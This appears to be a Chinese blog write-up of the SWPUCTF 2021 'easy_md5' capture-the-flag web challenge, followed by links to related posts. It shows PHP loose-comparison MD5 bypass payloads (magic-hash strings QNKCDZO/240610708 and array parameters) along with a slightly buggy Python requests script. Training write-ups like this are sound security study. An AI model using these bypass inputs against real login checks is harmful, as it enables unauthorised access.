[SWPUCTF 2021 新生赛]easy_md5

于 2024-09-27 10:08:05 发布
阅读量386 收藏 1
点赞数 12
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79210256/article/details/142567623
版权

分析一下代码, name 不等于password ,namd,md5值和password,md5值相等。get传参name,post传参password。

$name != $password && md5($name) == md5($password) 属于MD5绕过中的php == 弱类型绕过

有两个办法,

第一个办法就是

import requests

#网站的URL
url = "http://node7.anna.nssctf.cn:25352"
#get方法传递name的参数
name = "QNKCDZO"
#用post方法传递password的参数
password = "240610708"
#两个参数的md5值均以0e开头后面的字符纯字符
#发送post和get请求,并获取响应对象
response = requests.post(url,data={"name":name}params={"password":password})
#打印响应的文本内容
print(reponse.text)

第二个方法就是

get传参name[]=1,post传参password[]=2

2301_79210256
关注
[SWPUCTF 2021 新生]web方向(一到六题) 解题思路,实操解析,解题软件使用,解题方法教程
符啸九天的博客
09-07 389
[SWPUCTF 2021 新生]web方向 解题思路,实操解析,解题软件安装教程,解题方法教程。 [SWPUCTF 2021 新生]gift_F12、[SWPUCTF 2021 新生]jicao、[SWPUCTF 2021 新生]easy_md5、[SWPUCTF 2021 新生]include、[SWPUCTF 2021 新生]easy_sql
2021 SWUP新生 wp
XikX_eleven的博客
10-12 1996
2021 SWUP新生 wpWebgift_F12caidao Web gift_F12 如题所示f12找到flag caidao 蚁剑连接(中国菜刀连接可能会显示没有root权限) 根目录flag
NSSCTF | [SWPUCTF 2021 新生]easy_md5
2302_80946742的博客
05-08 1017
这个脚本的挑战点在于找到使得$name和$password的MD5哈希值在弱类型比较下相等,但这两个值本身并不相等的输入。正确的解决方式通常涉及寻找或利用已知的“魔术哈希”值。这道题有两种解法,一种是寻找两变量值不相等,但md5后的散列值相等的一组数据,分别使用GET和POST两种请求方法传入即可得到flag。另一种是通过数组绕过的方式。
NSS [SWPUCTF 2021 新生]easy_md5
Jay17的博客
07-04 237
NSS [SWPUCTF 2021 新生]easy_md5
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_md5解析(科学计数法,md5数组绕过)
2301_79326813的博客
01-21 1085
先看网页大致就是输入name和password的值,只要他俩的值不一样,然后经过md5函数之后一样就能出flag。
[SWPUCTF 2021 新生]jicao、easy_md5
2401_82985722的博客
04-12 956
JSON是什么?对JSON的简单理解_josn是什么-CSDN博客JSON(全称JavaScript)是一种存储数据的方式,使用键值对e.g.{“key”:”value”}的形式表示数据。JSON中,键是一个字符串。值可以是字符串、数字、布尔值、数组、嵌套的JSON对象或null。
NSSCTF练习记录:[SWPUCTF 2021 新生]ez_rsa
qq_44396970的博客
08-25 201
特征为RSA非对称加密,用脚本解密。用工具进行MD5加密,得到答案。
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1534
。。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2955
此处主要在NSSCTF平台()上开展刷题。
西柚SWPU新生(场外同步)miscAK 别的在混(
weixin_47234647的博客
10-18 2160
WEB:gift_F12 没啥好说的 直接F12得了 NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft} RE 简简单单的解密 import base64, urllib.parse def e(): key = "HereIsFlagggg" flag = "xxxxxxxxxxxxxxxxxxx" s_box = list(range(256)) j = 0 # 打乱s_box 和flag无关 for i in
AndroidStudio】关于AndroidStudio的常见控件TextView和Button
最新发布
PleaSure乐事的博客
09-26 181
AndroidStudio中TextView和Button控件的使用
Android Camera 预览角度和拍照保存图片角度相关
sinat_37429535的博客
09-23 1126
基于Android R(11)
安卓数据存储——SharedPreferences
大风起兮云飞扬
09-21 500
1、sharedPreferences是Android的一个轻量级存储工具,采用的存储结构是key - value的键值对方式2、共享参数的存储介质是符合XML规范的配置文件。保存路径是:/data/data/应用包名/shared_prefs/文件名.xml。
MYSQL SWAP 内存 vm.swappiness
jnrjian的博客
09-20 905
关于 vm.swappiness 的困惑来自于这样一个事实:在较旧的 Red Hat 内核中,vm.swappiness 的值为 0 会导致最少量的交换以避免内存不足的情况。在较新的内核中(从 RHEL 内核 2.6.32-303 开始​​),值为 0 将完全禁用交换,但值为 1 将提供最少量的交换以避免内存不足的情况。在较旧的内核中,0 和 1 之间的实际差异并不大,但 1 是避免较新内核中出现 OOM 情况的安全设置(当然,假设有一些交换空间可用)。考虑到系统自动将未使用的页面交换到磁盘。
Android compose 的基本环境搭建
qq_53374893的博客
09-26 672
导入版本。
使用Charles抓包Android App数据
CYRUS STUDIO
09-23 572
分别点击 Web Proxy、Seure Web Proxy 和 SOCKS Proxy 设置一下Clash的地址和端口。把证书 push 到 /system/etc/security/cacerts(系统证书目录)比如这里得到的hash值为e4473cf9,把证书的文件名改为 e4473cf9.0。通过 ipconfg 或者打开【网络和Internet】找到电脑的 ip 地址。手机设置中打开【信任的凭据】【系统】可以看到已经有charles的证书了。电脑开启共享热点,手机连接热点并设置代理。
android system_server进程
轻口味的专栏
09-23 918
system_server进程是系统进程,java framework框架的核心载体,里面运行了大量的系统服务,比如这里提供ApplicationThreadProxy(简称ATP),ActivityManagerService(简称AMS),这个两个服务都运行在system_server进程的不同线程中,由于ATP和AMS都是基于IBinder接口,都是binder线程,binder线程的创建与销毁都是由binder驱动来决定的。系统为什么不允许在子线程中访问UI?
Android OpenGLES2.0开发(一):艰难的开始
xiaozhiwz的专栏
09-23 834
本章节我们简单讲解了OpenGL ES是什么,刨除了很多晦涩难懂的概念。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值